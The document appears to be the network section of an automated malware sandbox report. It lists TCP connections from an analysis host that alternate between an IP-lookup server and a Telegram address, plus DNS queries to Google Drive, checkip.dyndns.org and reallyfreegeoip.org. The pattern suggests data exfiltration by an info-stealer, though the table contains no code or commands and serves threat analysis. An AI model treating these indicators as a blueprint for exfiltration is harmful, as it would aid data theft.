Jan 10, 2025 21:54:25.645160913 CET	50039	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:25.649998903 CET	80	50039	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:26.336905956 CET	80	50039	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:26.342511892 CET	50040	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:26.342561007 CET	443	50040	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:26.342623949 CET	50040	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:26.342900991 CET	50040	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:26.342909098 CET	443	50040	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:26.347131014 CET	49919	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:26.377818108 CET	50039	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:27.011814117 CET	443	50040	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:27.013465881 CET	50040	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:27.013489962 CET	443	50040	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:27.013549089 CET	50040	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:27.013557911 CET	443	50040	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:27.275769949 CET	443	50040	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:27.275990009 CET	443	50040	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:27.276058912 CET	50040	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:27.276360035 CET	50040	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:27.279946089 CET	50039	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:27.281094074 CET	50041	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:27.285059929 CET	80	50039	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:27.285156012 CET	50039	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:27.286041021 CET	80	50041	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:27.286139011 CET	50041	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:27.286241055 CET	50041	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:27.291008949 CET	80	50041	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:27.987797022 CET	80	50041	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:27.989156008 CET	50042	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:27.989212990 CET	443	50042	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:27.989291906 CET	50042	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:27.989625931 CET	50042	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:27.989653111 CET	443	50042	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:28.034070969 CET	50041	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:28.648474932 CET	443	50042	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:28.650026083 CET	50042	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:28.650055885 CET	443	50042	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:28.650115967 CET	50042	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:28.650125980 CET	443	50042	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:28.966240883 CET	443	50042	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:28.966463089 CET	443	50042	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:28.966545105 CET	50042	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:28.966846943 CET	50042	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:28.969856977 CET	50041	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:28.971052885 CET	50043	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:28.975034952 CET	80	50041	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:28.975112915 CET	50041	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:28.975967884 CET	80	50043	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:28.976061106 CET	50043	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:28.976141930 CET	50043	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:28.980967999 CET	80	50043	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:29.652610064 CET	80	50043	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:29.660789967 CET	50044	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:29.660832882 CET	443	50044	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:29.660903931 CET	50044	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:29.661145926 CET	50044	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:29.661161900 CET	443	50044	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:29.705914974 CET	50043	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:30.288585901 CET	443	50044	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:30.290378094 CET	50044	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:30.290404081 CET	443	50044	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:30.290462017 CET	50044	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:30.290472984 CET	443	50044	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:30.719724894 CET	443	50044	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:30.719958067 CET	443	50044	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:30.720026970 CET	50044	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:30.720308065 CET	50044	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:30.723339081 CET	50043	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:30.724425077 CET	50045	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:30.728410959 CET	80	50043	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:30.728481054 CET	50043	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:30.729264021 CET	80	50045	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:30.729334116 CET	50045	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:30.729417086 CET	50045	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:30.734251022 CET	80	50045	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:31.428575039 CET	80	50045	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:31.430079937 CET	50046	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:31.430113077 CET	443	50046	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:31.430175066 CET	50046	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:31.430464983 CET	50046	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:31.430475950 CET	443	50046	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:31.471662045 CET	50045	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:32.055223942 CET	443	50046	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:32.057621956 CET	50046	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:32.057687998 CET	443	50046	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:32.057838917 CET	50046	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:32.057852983 CET	443	50046	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:32.680455923 CET	443	50046	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:32.680663109 CET	443	50046	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:32.680746078 CET	50046	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:32.681051016 CET	50046	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:32.684640884 CET	50045	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:32.685233116 CET	50047	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:32.689666033 CET	80	50045	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:32.689735889 CET	50045	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:32.690047026 CET	80	50047	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:32.690119028 CET	50047	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:32.690221071 CET	50047	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:32.694958925 CET	80	50047	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:33.393652916 CET	80	50047	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:33.395077944 CET	50048	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:33.395163059 CET	443	50048	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:33.395276070 CET	50048	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:33.395579100 CET	50048	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:33.395615101 CET	443	50048	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:33.440346003 CET	50047	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:34.030098915 CET	443	50048	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:34.032006025 CET	50048	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:34.032035112 CET	443	50048	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:34.032110929 CET	50048	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:34.032123089 CET	443	50048	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:34.433001995 CET	443	50048	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:34.433232069 CET	443	50048	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:34.433324099 CET	50048	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:34.433660984 CET	50048	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:34.436477900 CET	50047	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:34.437469006 CET	50049	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:34.443001032 CET	80	50047	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:34.443020105 CET	80	50049	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:34.443084002 CET	50047	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:34.443118095 CET	50049	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:34.443214893 CET	50049	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:34.448133945 CET	80	50049	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:35.128767967 CET	80	50049	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:35.130069971 CET	50050	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:35.130157948 CET	443	50050	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:35.130268097 CET	50050	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:35.130517960 CET	50050	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:35.130557060 CET	443	50050	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:35.174696922 CET	50049	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:35.758579969 CET	443	50050	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:35.760236979 CET	50050	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:35.760262012 CET	443	50050	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:35.760320902 CET	50050	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:35.760329962 CET	443	50050	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:36.122281075 CET	443	50050	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:36.122385979 CET	443	50050	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:36.122467995 CET	50050	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:36.122792959 CET	50050	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:36.125966072 CET	50049	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:36.126821041 CET	50051	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:36.131103992 CET	80	50049	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:36.131179094 CET	50049	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:36.131649017 CET	80	50051	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:36.131755114 CET	50051	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:36.131848097 CET	50051	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:36.136663914 CET	80	50051	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:36.847985983 CET	80	50051	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:36.849046946 CET	50052	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:36.849095106 CET	443	50052	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:36.849236965 CET	50052	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:36.849512100 CET	50052	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:36.849524975 CET	443	50052	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:36.893723965 CET	50051	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:37.459726095 CET	443	50052	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:37.461464882 CET	50052	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:37.461483002 CET	443	50052	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:37.461627007 CET	50052	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:37.461639881 CET	443	50052	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:37.976910114 CET	443	50052	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:37.977150917 CET	443	50052	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:37.977247953 CET	50052	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:37.977559090 CET	50052	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:37.980819941 CET	50051	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:37.981962919 CET	50053	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:37.985831976 CET	80	50051	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:37.985905886 CET	50051	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:37.986855984 CET	80	50053	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:37.986933947 CET	50053	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:37.987035036 CET	50053	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:37.991838932 CET	80	50053	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:38.671724081 CET	80	50053	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:38.673489094 CET	50054	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:38.673542023 CET	443	50054	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:38.673652887 CET	50054	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:38.674063921 CET	50054	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:38.674083948 CET	443	50054	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:38.721661091 CET	50053	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:39.283874989 CET	443	50054	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:39.285645008 CET	50054	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:39.285665989 CET	443	50054	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:39.285808086 CET	50054	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:39.285816908 CET	443	50054	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:39.575335026 CET	443	50054	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:39.575455904 CET	443	50054	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:39.575525999 CET	50054	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:39.575934887 CET	50054	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:39.579550982 CET	50053	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:39.580133915 CET	50055	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:39.584551096 CET	80	50053	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:39.584614992 CET	50053	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:39.584906101 CET	80	50055	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:39.584984064 CET	50055	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:39.585087061 CET	50055	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:39.589871883 CET	80	50055	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:40.275865078 CET	80	50055	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:40.277404070 CET	50056	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:40.277501106 CET	443	50056	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:40.277610064 CET	50056	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:40.277868032 CET	50056	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:40.277893066 CET	443	50056	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:40.330941916 CET	50055	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:40.968532085 CET	443	50056	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:40.970215082 CET	50056	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:40.970233917 CET	443	50056	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:40.970292091 CET	50056	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:40.970299006 CET	443	50056	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:41.366920948 CET	443	50056	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:41.367139101 CET	443	50056	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:41.367233038 CET	50056	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:41.367501974 CET	50056	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:41.370242119 CET	50055	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:41.371258974 CET	50057	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:41.375300884 CET	80	50055	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:41.375370026 CET	50055	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:41.376115084 CET	80	50057	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:41.376184940 CET	50057	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:41.376315117 CET	50057	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:41.381104946 CET	80	50057	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:42.094899893 CET	80	50057	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:42.096774101 CET	50058	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:42.096867085 CET	443	50058	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:42.096973896 CET	50058	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:42.097349882 CET	50058	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:42.097374916 CET	443	50058	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:42.143605947 CET	50057	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:42.730107069 CET	443	50058	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:42.731833935 CET	50058	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:42.731857061 CET	443	50058	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:42.731915951 CET	50058	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:42.731925011 CET	443	50058	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:43.154282093 CET	443	50058	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:43.154385090 CET	443	50058	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:43.154505014 CET	50058	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:43.155090094 CET	50058	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:43.159038067 CET	50057	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:43.160443068 CET	50059	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:43.164268017 CET	80	50057	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:43.164365053 CET	50057	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:43.165245056 CET	80	50059	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:43.165343046 CET	50059	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:43.165463924 CET	50059	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:43.170377016 CET	80	50059	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:43.851001978 CET	80	50059	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:43.852236986 CET	50060	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:43.852296114 CET	443	50060	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:43.852355003 CET	50060	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:43.852653027 CET	50060	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:43.852674961 CET	443	50060	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:43.893431902 CET	50059	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:44.465226889 CET	443	50060	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:44.467088938 CET	50060	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:44.467128992 CET	443	50060	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:44.467187881 CET	50060	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:44.467195988 CET	443	50060	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:44.897531986 CET	443	50060	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:44.897660017 CET	443	50060	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:44.897736073 CET	50060	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:44.898070097 CET	50060	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:44.900966883 CET	50059	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:44.901655912 CET	50061	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:44.905949116 CET	80	50059	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:44.906029940 CET	50059	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:44.906447887 CET	80	50061	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:44.909732103 CET	50061	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:44.909847975 CET	50061	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:44.914674997 CET	80	50061	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:45.616283894 CET	80	50061	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:45.620647907 CET	50062	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:45.620698929 CET	443	50062	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:45.620774031 CET	50062	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:45.621256113 CET	50062	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:45.621278048 CET	443	50062	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:45.674686909 CET	50061	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:46.268475056 CET	443	50062	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:46.269965887 CET	50062	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:46.270032883 CET	443	50062	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:46.270097971 CET	50062	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:46.270112038 CET	443	50062	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:46.729870081 CET	443	50062	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:46.729968071 CET	443	50062	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:46.730022907 CET	50062	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:46.730437994 CET	50062	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:46.733717918 CET	50061	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:46.734483957 CET	50063	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:46.738753080 CET	80	50061	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:46.738804102 CET	50061	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:46.739270926 CET	80	50063	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:46.739340067 CET	50063	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:46.739422083 CET	50063	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:46.744155884 CET	80	50063	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:47.417826891 CET	80	50063	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:47.419083118 CET	50064	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:47.419143915 CET	443	50064	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:47.419205904 CET	50064	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:47.419487000 CET	50064	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:47.419502020 CET	443	50064	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:47.471556902 CET	50063	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:48.055332899 CET	443	50064	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:48.112205982 CET	50064	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:50.129157066 CET	50064	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:50.129204035 CET	443	50064	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:50.129259109 CET	50064	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:50.129270077 CET	443	50064	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:50.540777922 CET	443	50064	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:50.540862083 CET	443	50064	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:50.541024923 CET	50064	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:50.541301012 CET	50064	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:50.543395042 CET	50063	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:50.544300079 CET	50065	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:50.548384905 CET	80	50063	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:50.548455000 CET	50063	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:50.549165010 CET	80	50065	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:50.549254894 CET	50065	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:50.549308062 CET	50065	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:50.554111958 CET	80	50065	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:51.247606993 CET	80	50065	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:51.299695015 CET	50065	80	192.168.2.5	132.226.247.73

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 21:53:21.756522894 CET	55775	53	192.168.2.5	1.1.1.1
Jan 10, 2025 21:53:21.763258934 CET	53	55775	1.1.1.1	192.168.2.5
Jan 10, 2025 21:53:22.904962063 CET	62815	53	192.168.2.5	1.1.1.1
Jan 10, 2025 21:53:22.912096024 CET	53	62815	1.1.1.1	192.168.2.5
Jan 10, 2025 21:53:27.372457981 CET	56241	53	192.168.2.5	1.1.1.1
Jan 10, 2025 21:53:27.379612923 CET	53	56241	1.1.1.1	192.168.2.5
Jan 10, 2025 21:53:28.684919119 CET	65242	53	192.168.2.5	1.1.1.1
Jan 10, 2025 21:53:28.692665100 CET	53	65242	1.1.1.1	192.168.2.5
Jan 10, 2025 21:53:35.028512955 CET	51783	53	192.168.2.5	1.1.1.1
Jan 10, 2025 21:53:35.035414934 CET	53	51783	1.1.1.1	192.168.2.5
Jan 10, 2025 21:54:29.653590918 CET	50562	53	192.168.2.5	1.1.1.1
Jan 10, 2025 21:54:29.660320044 CET	53	50562	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 21:53:21.756522894 CET	192.168.2.5	1.1.1.1	0x4486	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:53:22.904962063 CET	192.168.2.5	1.1.1.1	0xf5fb	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:53:27.372457981 CET	192.168.2.5	1.1.1.1	0x5ead	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:53:28.684919119 CET	192.168.2.5	1.1.1.1	0x9f65	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
